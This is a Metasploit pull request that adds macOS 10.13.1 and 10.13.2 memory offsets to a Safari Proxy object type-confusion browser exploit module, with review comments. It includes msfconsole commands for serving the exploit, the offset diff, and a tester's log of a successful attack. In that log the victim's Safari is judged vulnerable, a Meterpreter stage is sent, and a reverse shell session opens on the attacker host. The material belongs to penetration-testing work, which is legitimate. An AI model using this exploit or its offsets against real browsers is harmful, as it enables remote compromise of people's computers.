### PR TITLE
add 10.13.1 and 10.13.2 offsets for the safari_proxy_object_type_confusion module

### PR DESCRIPTION
**Pull request by timwr**
This pull request adds some missing offsets for 10.13.1 and 10.13.2. This are from @cndycc (thanks!!!)
I haven't tested them, and it might be fiddly to get an environment for this, so I suggest just testing whether the module loads and returns javascript rather than testing the actual exploit.

Maybe @cndycc can show us the results from his testing.

## Verification

List the steps needed to make sure this thing works

- [ ] Start `msfconsole` and run the module: 
```
use exploit/osx/browser/safari_proxy_object_type_confusion
set SRVHOST 127.0.0.1
set URIPATH /test
set LHOST 127.0.0.1
run
```
- [ ] Use curl to imitate the user agent: `curl -A "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_1) AppleWebKit/601.2.7 (KHTML, like Gecko) Version/10.0.1 Safari/601.2.7" http://127.0.0.1:8080/test`
- [ ] **Verify** you get javascript back from the server

### CODE REVIEW

File: modules/exploits/osx/browser/safari_proxy_object_type_confusion.rb [hunk 1]
```diff
@@ -65,6 +65,22 @@ def offset_table
...
       },
+      '10.13.1' => {
+        :jsc_vtab => '0x0000e5f8',
+        :dyld_stub_loader => '0x000012a8',
+        :dlopen => '0x00002e60',
+        :confstr => '0x000024dc',
+        :strlen => '0x00001420',
+        :strlen_got => '0xee8',
+      },
+       '10.13.2' => {
```
Comment (bcoles) [inline modules/exploits/osx/browser/safari_proxy_object_type_confusion.rb:76]: :P

```suggestion
      '10.13.2' => {
```

**Comment by bcoles** [comment]
It seems @cndycc is hiding from you.

I don't have a test environment for this.

Is there a source for these offsets?

If you trust @cndycc's offsets then I'll merge this once the egregious superfluous whitespace is removed.

**Comment by timwr** [comment]
@bcoles the whitespace should be fixed now, good spot.
@cndycc sent me the offsets in a twitter DM, so no source unfortunately.

**Review by bcoles — APPROVED** [review]

**Comment by bcoles** [comment]
# Release Notes

Add offsets to the `exploit/osx/browser/safari_proxy_object_type_confusion` exploit module for Mac OSX 10.13.1 and 10.13.2.

**Comment by cndycc** [comment]
Sorry, I didn't get around to test it sooner. 
Confirm successful tests on 10.13.0-10.13.2.
Output on 10.13.0 (default settings):

msf6 exploit(osx/browser/safari_proxy_object_type_confusion) > exploit
Exploit running as background job 0.
Exploit completed, but no session was created.

Started reverse TCP handler on 192.168.99.22:4444 
Using URL: http[:]//0.0.0.0:8080/Xyl1tH
msf6 exploit(osx/browser/safari_proxy_object_type_confusion) > Local IP: http[:]//192.168.99.22:8080/Xyl1tH
Server started.
192.168.99.10  safari_proxy_object_type_confusion - Request from Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13) AppleWebKit/604.1.38 (KHTML, like Gecko) Version/11.0 Safari/604.1.38
192.168.99.10  safari_proxy_object_type_confusion - Safari version 11.0 appears to be vulnerable
Sending stage (39328 bytes) to 192.168.99.10
Meterpreter session 1 opened (192.168.99.22:4444 -> 192.168.99.10:49245) at 2021-02-11 18:24:31 +0100
sessions

Active sessions

  Id  Name  Type                    Information                     Connection
  1         **meterpreter python/osx  debug @ debugs-Mac.local  192.168.99.22:4444 -> 192.168.99.10:49245 (192.168.99.10)**

msf6 exploit(osx/browser/safari_proxy_object_type_confusion) > sessions -i 1
Starting interaction with 1...

**meterpreter > sysinfo
Computer     : debugs-Mac.local
OS           : Darwin 17.0.0 Darwin Kernel Version 17.0.0: Thu Aug 24 21:48:19 PDT 2017; root:xnu-4570.1.46~2/RELEASE_X86_64
Architecture : x64
Meterpreter  : python/osx**

**Comment by timwr** [comment]
Thanks @cndycc !!

**Pull request merged**